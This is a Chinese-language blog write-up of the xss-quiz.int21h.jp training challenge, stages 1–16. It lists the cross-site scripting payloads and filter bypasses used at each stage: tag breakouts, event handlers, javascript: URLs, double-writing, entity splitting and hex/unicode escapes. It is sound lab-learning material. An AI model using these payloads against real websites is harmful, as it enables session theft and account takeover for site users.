XSS challenges 1-16

看了一遍视频后自己再试一试,挠头

https://xss-quiz.int21h.jp/

Stage #1

输入1111

显示

 

 

 查看代码

 

 

 直接输入

<script>alert(document.domain);</script>

 

Stage #2

输入1111

查看代码,如图

 

 

 尝试闭合标签

1111 "><script>alert(document.domain)</script>

成功,并且代码显示为

 

 

Stage #3

输入1111

代码显示为

 

 

 尝试

"><script>alert(document.domain);</script>

显示

 

 

 考虑在Japan后进行闭合,打开Burpsuite,进行如图修改

 

 

 

p1=1111&p2=Japan >"<script>alert(document.domain)</script>

 成功

 

Stage #4

输入1111

 

 

 能发现有个hidden,抓包后能看到

 

则尝试在hackme后面添加”><script>alert(document.domain)</script>

 

 

 成功

 

Stage #5

输入1111

查看代码

 

 

 maxlength只有15,如果输入

"><script>alert(document.domain)</script>不够长

 如图

 

 

 则修改maxlength

 

 

 再次输入"><script>alert(document.domain)</script>

 

 

 成功

 

 

Stage #6

输入1111,查看代码

 

 

 尝试闭合,输入"><script>alert(document.domain)</script>

"、<、>都被转换

 

 

 尝试" onmouseover="alert(document.domain)

 

 

 成功,代码显示为

 

 

 

 

Stage #7

输入1111,查看代码

 

 

 尝试"><script>alert(document.domain)</script>

显示

 

 

 尝试" onmouseover="alert(document.domain)

显示

 

 

 观察代码,好像多了两个双引号,尝试onmouseover=alert(document.domain)

显示

 

 

 挠头,再试试"onmouseover=alert(document.domain)

 

 

 挠头

看看hint

Hint: nearly the same... but a bit more tricky.再看看代码

试试"       onmouseover=alert(document.domain)

行了

 

 

 

Stage #8

输入1111,查看代码

 

 

 和页面显示的

 

 

 尝试javascript:alert(document.domain)

点击产生的url

 

 

 成功

 

Stage #9

输入1111

 

 

 眼熟,嗯

先试试"><script>alert(document.domain)</script>

 

 

 果然不行,再试试"onmouseover=alert(document.domain),还是不行

 

 

 再试试">,还是被变成了字符串的形式

 

 

 

再看看hint

Hint: UTF-7 XSS,挠头

跳过

在console里输入

 

 

 进入下一关

Stage #10

先输入1111,看代码

 

 

 好像比较正常,试试

"><script>alert(document.domain)</script>

 

 

 我的domain呢??

试试双写

"><script>alert(document.domdomainain)</script>

ok了

Stage #11

输入1111

 

 

 比较正常,试试"><script>alert(document.domain)</script>

 

 

 

 

 

 被转换了

再试试"onmouseover=alert(document.domain)

 

 

 onmouseover被过滤了

再试试"><a href="javascript:alert(documment.domain)">xss</a>

 

 

 

 

挠头,被转换了

试试&#10;将JavaScript分开

"><a href="javascr&#10;ipt:alert(document.domain);">xss<a>

 点击xss

成功

 

Stage #12

输入1111,查看代码

 

 挺正常的,试试"><script>alert(document.domain)</script>

 

 >,<都被消去了,看看hint试试将<,>转换成16进制

"\x3e\x3cscript\x3ealert(document.domain);\x3c/script\x3e

 

 挠头,试试

"\\x3e\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

挠头,百度启动,要在IE浏览器中用``,

跳过

Stage #13

好像这个的操作别的浏览器不支持了,只有IE支持

跳过

Stage #14

挠头,跳过

Stage #15

输入1111,看代码

 

 

 

挠头,挺正常,试试"><script>alert(document.domain)</script>

 

 

挠头,试试转换<,>

"\x3e\x3cscript\x3ealert(document.domain);\x3c/script\x3e

 

 

再试试"\\x3e\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

 

 

 ok

Stage #16

直接unicode转换

"\\u003e\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

ok

 

  • 添加到短语集
     
    • https://www.nationalgeographic.com/magazine/2020/01/scientists-are-unraveling-the-mysteries-of-pain-feature/
    • 创建新的单词集...
  • 拷贝
posted @ 2020-05-23 22:51  晓屈  阅读(311)  评论(0编辑  收藏  举报